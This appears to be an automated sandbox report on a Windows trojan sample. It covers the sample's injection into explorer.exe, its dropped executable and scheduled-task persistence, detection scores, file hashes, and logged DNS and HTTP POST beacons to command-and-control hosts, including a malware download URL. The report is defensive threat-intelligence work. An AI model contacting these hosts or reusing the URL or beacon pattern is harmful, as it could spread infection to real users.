            Source: Yara match | File source: 00000015.00000002.405322219.0000000000500000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000015.00000002.405829764.0000000002061000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.338557763.00000000004C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.338606370.00000000004E1000.00000004.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Native API 1 | DLL Side-Loading 1 | Process Injection 512 | Masquerading 11 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Exploitation for Client Execution 1 | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Virtualization/Sandbox Evasion 12 | LSASS Memory | Security Software Discovery 321 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 13 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 512 | Security Account Manager | Virtualization/Sandbox Evasion 12 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Hidden Files and Directories 1 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 124 | SIM Card Swap | Carrier Billing Fraud |
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 2 | LSA Secrets | Application Window Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 1 | Cached Domain Credentials | System Information Discovery 4 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
            External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
            Behavior Graph (ID: 529748, Sample: cf71PGrIPQ.exe, Startdate: 28/11/2021, Architecture: WINDOWS, Score: 100). Process nodes, edges and annotations recovered from the graph:

            • cf71PGrIPQ.exe started. Signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Antivirus detection for URL or domain; 4 other signatures
            • cf71PGrIPQ.exe -> cf71PGrIPQ.exe (child) started. Signatures: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration)
            • cf71PGrIPQ.exe (child) -> explorer.exe injected. DNS/IP: privacytoolzforyou-7000.com 212.193.50.94 (ports 49748, 49786, 49815; ASBAXETNRU, Russian Federation); host-data-coin-11.com. Dropped: C:\Users\user\AppData\Roaming\iaivaah (PE32); C:\Users\user\...\iaivaah:Zone.Identifier (ASCII). Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Hides that the sample has been downloaded from the Internet (zone.identifier)
            • iaivaah started. Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Contains functionality to inject code into remote processes; Injects a PE file into a foreign processes
            • iaivaah -> iaivaah (child) started. Signature: Creates a thread in another existing process (thread injection)

            Source | Detection | Scanner | Label
            cf71PGrIPQ.exe | 33% | Virustotal |
            cf71PGrIPQ.exe | 48% | ReversingLabs | Win32.Trojan.CrypterX
            cf71PGrIPQ.exe | 100% | Joe Sandbox ML |
            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Roaming\iaivaah | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Roaming\iaivaah | 48% | ReversingLabs | Win32.Trojan.CrypterX
            Source | Detection | Scanner | Label
            6.2.cf71PGrIPQ.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            21.2.iaivaah.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            6.0.cf71PGrIPQ.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            6.1.cf71PGrIPQ.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            21.0.iaivaah.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            6.0.cf71PGrIPQ.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1126869
            6.0.cf71PGrIPQ.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1126869
            21.1.iaivaah.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            21.0.iaivaah.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            1.2.cf71PGrIPQ.exe.33215a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            21.0.iaivaah.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            17.2.iaivaah.32815a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            6.0.cf71PGrIPQ.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            6.0.cf71PGrIPQ.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1126869
            6.0.cf71PGrIPQ.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
            6.0.cf71PGrIPQ.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1126869
            Source | Detection | Scanner | Label
            host-data-coin-11.com | 3% | Virustotal |
            privacytoolzforyou-7000.com | 5% | Virustotal |
            Source | Detection | Scanner | Label
            http://host-data-coin-11.com/ | 3% | Virustotal |
            http://host-data-coin-11.com/ | 0% | Avira URL Cloud | safe
            http://file-coin-host-12.com/ | 4% | Virustotal |
            http://file-coin-host-12.com/ | 0% | Avira URL Cloud | safe
            http://privacytoolzforyou-7000.com/downloads/toolspab2.exe | 100% | Avira URL Cloud | malware


            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            host-data-coin-11.com | 212.193.50.94 | true | true | | unknown
            privacytoolzforyou-7000.com | 212.193.50.94 | true | true | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            http://host-data-coin-11.com/ | true | 3%, Virustotal; Avira URL Cloud: safe | unknown
            http://file-coin-host-12.com/ | true | 4%, Virustotal; Avira URL Cloud: safe | unknown
            http://privacytoolzforyou-7000.com/downloads/toolspab2.exe | true | Avira URL Cloud: malware | unknown
            IP | Domain | Country | ASN | ASN Name | Malicious
            212.193.50.94 | host-data-coin-11.com | Russian Federation | 49392 | ASBAXETNRU | true

            General Information

            Joe Sandbox Version:34.0.0 Boulder Opal
            Analysis ID:529748
            Start date:28.11.2021
            Start time:05:07:09
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 5m 37s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:cf71PGrIPQ.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of new started processes analysed:28
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@6/2@3/1
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 95.8% (good quality ratio 44.9%)
            • Quality average: 29.5%
            • Quality standard deviation: 35%
            HCA Information:Failed
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            Warnings:
            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
            • Excluded IPs from analysis (whitelisted): 23.211.4.86
            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com
            • Not all processes were analyzed; the report is missing behavior information
            Time | Type | Description
            05:08:43 | Task Scheduler | Run new task: Firefox Default Browser Agent 10B58E79CC339B93 path: C:\Users\user\AppData\Roaming\iaivaah
            Match | Associated Sample Name / URL | Detection | Context
            212.193.50.94 | Whg8jgqeOs.exe | malicious | lacasadicavour.com/load3.exe
            212.193.50.94 | ikeokicy4x.exe | malicious | lacasadicavour.com/load3.exe
            Match | Associated Sample Name / URL | Detection | Context
            host-data-coin-11.com | wFSlY2rwOP.exe | malicious | 45.8.127.19
            host-data-coin-11.com | phuVfdLnVm.exe | malicious | 45.8.127.19
            host-data-coin-11.com | qJDQgtq7rJ.exe | malicious | 45.8.127.19
            privacytoolzforyou-7000.com | wFSlY2rwOP.exe | malicious | 45.8.127.19
            privacytoolzforyou-7000.com | phuVfdLnVm.exe | malicious | 45.8.127.19
            privacytoolzforyou-7000.com | qJDQgtq7rJ.exe | malicious | 45.8.127.19
            privacytoolzforyou-7000.com | 23xboTzWGy.exe | malicious | 212.192.241.249
            Match | Associated Sample Name / URL | Detection | Context
            ASBAXETNRU | scBGm2BQi3.rtf | malicious | 212.193.51.49
            ASBAXETNRU | i9wanH88Pa.exe | malicious | 45.139.179.232
            ASBAXETNRU | Ref 0180066743_pdf_______________________.exe | malicious | 212.193.50.242
            ASBAXETNRU | uJ4Rs5evAk.exe | malicious | 45.139.179.232
            ASBAXETNRU | 8FylnxoGnp.exe | malicious | 45.139.179.232
            ASBAXETNRU | Payment Advice Advice GLVA29879055 Priority .exe | malicious | 212.193.50.242
            ASBAXETNRU | PO-0010A-HSG-210120.xlsx | malicious | 212.193.50.242
            ASBAXETNRU | rNCRBgB7LC.exe | malicious | 212.193.50.242
            ASBAXETNRU | Payment Advice Advice GLVA29879055 Priority .exe | malicious | 212.193.50.242
            ASBAXETNRU | MGI07oGTIM.exe | malicious | 212.193.50.242
            ASBAXETNRU | j030Ax9Cum.rtf | malicious | 212.193.50.242
            ASBAXETNRU | KIttKh48Tw.exe | malicious | 212.193.50.242
            ASBAXETNRU | e0oejnEdYa.exe | malicious | 212.193.50.242
            ASBAXETNRU | ekZDWpGPTB.exe | malicious | 45.139.179.232
            ASBAXETNRU | MV LILY SEA.xlsx | malicious | 212.193.50.242
            ASBAXETNRU | VDI-QUOTATION-PAYMENT.xlsx | malicious | 212.193.50.242
            ASBAXETNRU | Cotizaci#U00f3n_pdf_________________________________________________.exe | malicious | 212.193.50.242
            ASBAXETNRU | Nota de aviso de pago del 25.11.2021.PDF.exe | malicious | 212.193.50.242
            ASBAXETNRU | BP I-2111232.exe | malicious | 212.193.50.242
            ASBAXETNRU | 3E8869030B9C89B8C43E9F8A6730A516E3945AB1272E3.exe | malicious | 212.193.50.242
            C:\Users\user\AppData\Roaming\iaivaah
            Process:C:\Windows\explorer.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):321024
            Entropy (8bit):5.571504370703933
            Encrypted:false
            SSDEEP:6144:bJhiMLzKtF+5t5CPqTTfMNqSXuZet0ygwcAzvzEgV2Lo:l93FQPqTTfSqSXuZet0ygwcKEgQL
            MD5:19B07BFA4BA4CFFBA03DFF47A9EFDF36
            SHA1:0629443D410C7EF3CDEC3528C257022F4700D062
            SHA-256:79C00DB1607B8F07618EE3F90F5C4E160C7DE05BCE6380A7DE83171E2EAC11D4
            SHA-512:38BA5CE878E41A4C52AB3E4F9A1399DE227E21AB11A94DE1F57640E6C5F3B6263A875F7C9F208640638C233E5084AB80F48D466203B598A466D437F6BE5E53D4
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 48%
            Reputation:low
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R...R...R...=.2.{...=...B...=.3.1...[...U...R.......=.6.S...=...S...=...S...RichR...................PE..L....._.....................Z.......|....... ....@.............................................................................P.......0g...........................................................z..@...............x............................text...>........................... ..`.data........ ...b..................@....rsrc...0g.......h...j..............@..@.reloc..@...........................@..B........................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Roaming\iaivaah:Zone.Identifier
            Process:C:\Windows\explorer.exe
            File Type:ASCII text, with CRLF line terminators
            Category:modified
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Reputation:high, very likely benign file
            Preview: [ZoneTransfer]....ZoneId=0

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):5.571504370703933
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:cf71PGrIPQ.exe
            File size:321024
            MD5:19b07bfa4ba4cffba03dff47a9efdf36
            SHA1:0629443d410c7ef3cdec3528c257022f4700d062
            SHA256:79c00db1607b8f07618ee3f90f5c4e160c7de05bce6380a7de83171e2eac11d4
            SHA512:38ba5ce878e41a4c52ab3e4f9a1399de227e21ab11a94de1f57640e6c5f3b6263a875f7c9f208640638c233e5084ab80f48d466203b598a466d437f6be5e53d4
            SSDEEP:6144:bJhiMLzKtF+5t5CPqTTfMNqSXuZet0ygwcAzvzEgV2Lo:l93FQPqTTfSqSXuZet0ygwcKEgQL
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R...R...R...=.2.{...=...B...=.3.1...[...U...R.......=.6.S...=...S...=...S...RichR...................PE..L......_...........

            File Icon

            Icon Hash:c8d0d8e0f8e8f4e8

            General

            Entrypoint:0x417c90
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
            DLL Characteristics:TERMINAL_SERVER_AWARE
            Time Stamp:0x5FC7ADE7 [Wed Dec 2 15:08:23 2020 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:1
            File Version Major:5
            File Version Minor:1
            Subsystem Version Major:5
            Subsystem Version Minor:1
            Import Hash:e8c238b864f7b42d074feea3c8efffa3
            Instruction
            mov edi, edi
            push ebp
            mov ebp, esp
            call 00007FA8CC360A2Bh
            call 00007FA8CC360736h
            pop ebp
            ret
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            mov edi, edi
            push ebp
            mov ebp, esp
            push FFFFFFFEh
            push 0042F830h
            push 0041BEB0h
            mov eax, dword ptr fs:[00000000h]
            push eax
            add esp, FFFFFF98h
            push ebx
            push esi
            push edi
            mov eax, dword ptr [00432064h]
            xor dword ptr [ebp-08h], eax
            xor eax, ebp
            push eax
            lea eax, dword ptr [ebp-10h]
            mov dword ptr fs:[00000000h], eax
            mov dword ptr [ebp-18h], esp
            mov dword ptr [ebp-70h], 00000000h
            lea eax, dword ptr [ebp-60h]
            push eax
            call dword ptr [004012D4h]
            cmp dword ptr [0320F9DCh], 00000000h
            jne 00007FA8CC360730h
            push 00000000h
            push 00000000h
            push 00000001h
            push 00000000h
            call dword ptr [00401244h]
            call 00007FA8CC3608B3h
            mov dword ptr [ebp-6Ch], eax
            call 00007FA8CC36487Bh
            test eax, eax
            jne 00007FA8CC36072Ch
            push 0000001Ch
            call 00007FA8CC360870h
            add esp, 04h
            call 00007FA8CC3641D8h
            test eax, eax
            jne 00007FA8CC36072Ch
            push 00000010h
            call 00007FA8CC36085Dh
            add esp, 04h
            push 00000001h
            call 00007FA8CC364123h
            add esp, 04h
            call 00007FA8CC361DDBh
            mov dword ptr [ebp-04h], 00000000h
            call 00007FA8CC3619BFh
            test eax, eax
            Programming Language:
            • [LNK] VS2010 build 30319
            • [ASM] VS2010 build 30319
            • [ C ] VS2010 build 30319
            • [C++] VS2010 build 30319
            • [RES] VS2010 build 30319
            • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2fe14 | 0x50 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2e11000 | 0x6730 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e18000 | 0x17c8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x13c0 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x17ac8 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x378 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3033e | 0x30400 | False | 0.608160621762 | data | 7.03134441107 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x32000 | 0x2dde9e0 | 0x6200 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x2e11000 | 0x6730 | 0x6800 | False | 0.569899338942 | data | 5.59196486771 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2e18000 | 0x11340 | 0x11400 | False | 0.0750537817029 | data | 0.977464876 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x2e11240 | 0xea8 | data | Spanish | Panama
RT_ICON | 0x2e120e8 | 0x6c8 | data | Spanish | Panama
RT_ICON | 0x2e127b0 | 0x568 | GLS_BINARY_LSB_FIRST | Spanish | Panama
RT_ICON | 0x2e12d18 | 0x25a8 | data | Spanish | Panama
RT_ICON | 0x2e152c0 | 0x10a8 | data | Spanish | Panama
RT_ICON | 0x2e16368 | 0x988 | dBase III DBT, version number 0, next free block index 40 | Spanish | Panama
RT_ICON | 0x2e16cf0 | 0x468 | GLS_BINARY_LSB_FIRST | Spanish | Panama
RT_STRING | 0x2e171c0 | 0x314 | data | Divehi; Dhivehi; Maldivian | Maldives
RT_STRING | 0x2e174d8 | 0x254 | data | Divehi; Dhivehi; Maldivian | Maldives
RT_GROUP_ICON | 0x2e17158 | 0x68 | data | Spanish | Panama
DLL | Import
KERNEL32.dll | LocalUnlock, GetThreadContext, GetPrivateProfileSectionNamesW, EnumResourceNamesW, SetCriticalSectionSpinCount, GlobalMemoryStatus, FindResourceA, lstrcmpA, FindFirstFileW, EnumCalendarInfoA, WriteConsoleInputW, IsBadStringPtrW, EnumDateFormatsExW, CopyFileExW, GetStringTypeA, UnmapViewOfFile, MoveFileExA, GetNumberOfConsoleInputEvents, GetConsoleAliasExesLengthA, BuildCommDCBAndTimeoutsA, SetUnhandledExceptionFilter, LoadLibraryExW, GetQueuedCompletionStatus, MoveFileExW, InterlockedDecrement, GetCurrentProcess, SetDefaultCommConfigW, SetEnvironmentVariableW, GlobalLock, GetComputerNameW, SetEvent, SetThreadExecutionState, OpenSemaphoreA, CreateHardLinkA, GetFileAttributesExA, FreeEnvironmentStringsA, _lclose, GetModuleHandleW, GetCommConfig, GetProcessHeap, IsBadReadPtr, GetSystemTimeAsFileTime, GetNumberFormatA, GetPrivateProfileStringW, GetConsoleTitleA, GetCompressedFileSizeW, ReadConsoleOutputA, WaitNamedPipeW, EnumTimeFormatsA, SetCommState, GetSystemWow64DirectoryA, TzSpecificLocalTimeToSystemTime, WaitForMultipleObjectsEx, GetProcessTimes, TlsSetValue, AllocateUserPhysicalPages, FindResourceExA, GlobalAlloc, GetConsoleMode, FatalAppExitW, GetThreadSelectorEntry, CopyFileW, GetPrivateProfileStructW, GetCalendarInfoW, ReadFileScatter, SetSystemTimeAdjustment, SetVolumeMountPointA, GetSystemWindowsDirectoryA, SetConsoleCP, DeleteVolumeMountPointW, LeaveCriticalSection, GetFileAttributesA, lstrcpynW, SetDllDirectoryA, SetConsoleMode, HeapValidate, GetVolumePathNamesForVolumeNameW, CreateSemaphoreA, SetConsoleCursorPosition, WritePrivateProfileSectionW, TerminateProcess, IsDBCSLeadByte, GetModuleFileNameW, CreateActCtxA, lstrcatA, GetBinaryTypeW, CompareStringW, lstrlenW, GetFullPathNameA, GlobalUnlock, VirtualUnlock, CreateJobObjectA, GetNamedPipeHandleStateW, EnumSystemLocalesA, GetPrivateProfileIntW, VerifyVersionInfoW, InterlockedExchange, GetStdHandle, FindFirstFileA, GetLastError, ChangeTimerQueueTimer, SetLastError, 
ReadConsoleOutputCharacterA, GetProcAddress, GetLongPathNameA, HeapSize, PeekConsoleInputW, BackupWrite, VerLanguageNameA, SetFirmwareEnvironmentVariableW, CreateNamedPipeA, EnumDateFormatsExA, CreateJobSet, EnterCriticalSection, SearchPathA, BuildCommDCBW, DefineDosDeviceA, GetNumaHighestNodeNumber, FindClose, GetPrivateProfileStringA, GetAtomNameA, LoadLibraryA, Process32FirstW, OpenMutexA, ProcessIdToSessionId, GetExitCodeThread, SetCurrentDirectoryW, SetFileApisToANSI, QueryDosDeviceW, PostQueuedCompletionStatus, HeapWalk, GetPrivateProfileStructA, SetNamedPipeHandleState, GetModuleFileNameA, GetDefaultCommConfigA, WriteProfileStringA, EnumDateFormatsA, WaitCommEvent, SetConsoleTitleW, FindFirstChangeNotificationA, GetProcessShutdownParameters, QueueUserWorkItem, ContinueDebugEvent, HeapSetInformation, IsDebuggerPresent, FreeEnvironmentStringsW, FindNextFileW, WriteProfileStringW, VirtualProtect, GetConsoleCursorInfo, WriteConsoleOutputAttribute, OutputDebugStringA, DuplicateHandle, GetVersionExA, TlsAlloc, TerminateJobObject, CloseHandle, GetVersion, FindFirstVolumeW, DeleteTimerQueueTimer, GlobalAddAtomW, SetFileValidData, GetTempPathA, FindActCtxSectionStringW, ResetWriteWatch, UnregisterWaitEx, InterlockedPushEntrySList, TlsFree, CopyFileExA, CommConfigDialogW, DeleteFileA, CreateThread, lstrcpyA, CreateFileW, SetStdHandle, RaiseException, WritePrivateProfileStringW, ExitProcess, GetCommandLineW, GetStartupInfoW, QueryPerformanceCounter, GetTickCount, GetCurrentThreadId, GetCurrentProcessId, InterlockedIncrement, DecodePointer, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, EncodePointer, TlsGetValue, HeapCreate, WriteFile, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, LoadLibraryW, UnhandledExceptionFilter, HeapAlloc, HeapReAlloc, HeapQueryInformation, HeapFree, RtlUnwind, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetStringTypeW, WriteConsoleW, OutputDebugStringW, 
IsProcessorFeaturePresent, SetFilePointer, GetConsoleCP, FlushFileBuffers
USER32.dll | GetMessageTime, GetMenuItemID
GDI32.dll | GetBitmapBits
Language of compilation system | Country where language is spoken
Spanish | Panama
Divehi; Dhivehi; Maldivian | Maldives

            Network Behavior


            Network Port Distribution

            • Total Packets: 64
            • 80 (HTTP)
            • 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 28, 2021 05:08:42.510080099 CET | 53910 | 53 | 192.168.2.3 | 8.8.8.8
Nov 28, 2021 05:08:42.530241966 CET | 53 | 53910 | 8.8.8.8 | 192.168.2.3
Nov 28, 2021 05:08:59.950397968 CET | 49559 | 53 | 192.168.2.3 | 8.8.8.8
Nov 28, 2021 05:09:00.266118050 CET | 53 | 49559 | 8.8.8.8 | 192.168.2.3
Nov 28, 2021 05:09:28.239465952 CET | 63297 | 53 | 192.168.2.3 | 8.8.8.8
Nov 28, 2021 05:09:28.532522917 CET | 53 | 63297 | 8.8.8.8 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 28, 2021 05:08:42.510080099 CET | 192.168.2.3 | 8.8.8.8 | 0x7de4 | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Nov 28, 2021 05:08:59.950397968 CET | 192.168.2.3 | 8.8.8.8 | 0x1b0f | Standard query (0) | host-data-coin-11.com | A (IP address) | IN (0x0001)
Nov 28, 2021 05:09:28.239465952 CET | 192.168.2.3 | 8.8.8.8 | 0x3e0b | Standard query (0) | privacytoolzforyou-7000.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 28, 2021 05:08:42.530241966 CET | 8.8.8.8 | 192.168.2.3 | 0x7de4 | No error (0) | host-data-coin-11.com | | 212.193.50.94 | A (IP address) | IN (0x0001)
Nov 28, 2021 05:09:00.266118050 CET | 8.8.8.8 | 192.168.2.3 | 0x1b0f | No error (0) | host-data-coin-11.com | | 212.193.50.94 | A (IP address) | IN (0x0001)
Nov 28, 2021 05:09:28.532522917 CET | 8.8.8.8 | 192.168.2.3 | 0x3e0b | No error (0) | privacytoolzforyou-7000.com | | 212.193.50.94 | A (IP address) | IN (0x0001)
            • cyknc.net
              • host-data-coin-11.com
            • sremv.net
            • privacytoolzforyou-7000.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49748 | 212.193.50.94 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 28, 2021 05:08:43.547394991 CET | 1145 | OUT | POST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://cyknc.net/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 233
            Host: host-data-coin-11.com
Nov 28, 2021 05:08:45.242983103 CET | 1146 | OUT | POST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://cyknc.net/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 233
            Host: host-data-coin-11.com
Nov 28, 2021 05:08:48.352559090 CET | 1273 | OUT | POST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://cyknc.net/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 233
            Host: host-data-coin-11.com
Nov 28, 2021 05:08:54.353080034 CET | 1894 | OUT | POST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://cyknc.net/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 233
            Host: host-data-coin-11.com
Nov 28, 2021 05:08:59.934400082 CET | 1941 | IN | HTTP/1.1 404 Not Found
            Server: nginx/1.20.1
            Date: Sun, 28 Nov 2021 04:08:56 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 1a b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a


